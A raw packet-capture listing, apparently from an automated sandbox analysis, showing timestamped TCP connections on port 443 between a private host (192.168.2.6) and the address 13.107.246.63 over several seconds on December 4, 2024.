                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.714072943 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.723412991 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.723526001 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.723622084 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.724313021 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.724347115 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.724364996 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.724371910 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.725994110 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.726015091 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.726238966 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.727878094 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.727912903 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.727973938 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.728096962 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.728102922 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.731451035 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.731523037 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.736356974 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.736390114 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.736408949 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.736417055 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.790404081 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.790456057 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.790522099 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.824759960 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.824800014 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.400398970 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.401106119 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.401132107 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.401655912 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.401663065 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.863464117 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.865813017 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.865878105 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.866029024 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.866055012 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.866066933 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.866071939 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.871598005 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.871649027 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.871716976 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.871885061 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:56.871895075 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.461348057 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.462063074 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.462079048 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.462565899 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.462570906 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.524542093 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.525312901 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.525338888 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.525803089 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.525811911 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.553314924 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.554042101 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.554069996 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.554558039 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.554564953 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.903362036 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.907524109 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.907586098 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.907598972 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.907643080 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.909188032 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.909216881 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.909230947 CET49829443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.909238100 CET4434982913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.915539980 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.915599108 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.915676117 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.915882111 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.915889025 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.979470968 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.983474016 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.983613968 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.984806061 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.984846115 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.984858990 CET49830443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.984864950 CET4434983013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.988717079 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.988766909 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.988848925 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.989015102 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.989022017 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.996251106 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999592066 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999654055 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999669075 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999720097 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999788046 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999811888 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999828100 CET49831443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:57.999835014 CET4434983113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.003220081 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.003283978 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.003365993 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.003496885 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.003515959 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.644890070 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.647892952 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.647990942 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.671443939 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.671494961 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.671511889 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.671519041 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.675424099 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.675476074 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.675543070 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.675746918 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.675764084 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.729331970 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.729948044 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.729965925 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.730459929 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:58.730467081 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.189971924 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.193814993 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.193890095 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.195028067 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.195051908 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.195065022 CET49832443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.195070982 CET4434983213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.198479891 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.198528051 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.198592901 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.198756933 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.198765993 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.735251904 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.736027956 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.736052036 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.736654043 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.736659050 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.752943993 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.753470898 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.753506899 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.753942013 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.753950119 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.834546089 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.838737965 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.838771105 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.839220047 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:59.839226007 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.180345058 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.183293104 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.183372974 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.183386087 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.183398008 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.183454037 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.197261095 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.197412968 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.197442055 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.197457075 CET49833443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.197463989 CET4434983313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.198931932 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.198995113 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.199122906 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.199141979 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.199155092 CET49834443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.199162960 CET4434983413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.201988935 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.202029943 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.202100039 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.202567101 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.202575922 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.203243017 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.203294039 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.203368902 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.203480959 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.203488111 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.290616035 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.290666103 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.290728092 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.290785074 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.290838003 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.291174889 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.291188955 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.291202068 CET49835443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.291207075 CET4434983513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.294590950 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.294634104 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.294713974 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.294887066 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.294900894 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.639228106 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.640012026 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.640034914 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.640506983 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:00.640515089 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.051624060 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.078315973 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.078356028 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.078835964 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.078845024 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.093694925 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.097034931 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.097150087 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.097150087 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.097179890 CET49836443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.097198009 CET4434983613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.100383997 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.100438118 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.100513935 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.100701094 CET49841443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.100717068 CET4434984113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.502789021 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.507908106 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.507988930 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.508021116 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.508052111 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.508152962 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.508172989 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.508184910 CET49837443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.508189917 CET4434983713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.511588097 CET49842443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.511624098 CET4434984213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.511703014 CET49842443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.511878967 CET49842443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:01.511885881 CET4434984213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.009130001 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.009912014 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.010000944 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.010399103 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.010409117 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.022458076 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.023220062 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.023246050 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.023741007 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.023749113 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.068752050 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.069545031 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.069567919 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.070033073 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.070039988 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.466586113 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.468904018 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.469002008 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.469053984 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.469094992 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.469136953 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.529246092 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.533160925 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.533315897 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.533837080 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.533859015 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.533874035 CET49838443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.533878088 CET4434983813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.535240889 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.535269976 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.535285950 CET49840443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.535293102 CET4434984013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.536021948 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.536048889 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.536065102 CET49839443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.536071062 CET4434983913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:02.668282986 CET49843443192.168.2.613.107.246.63
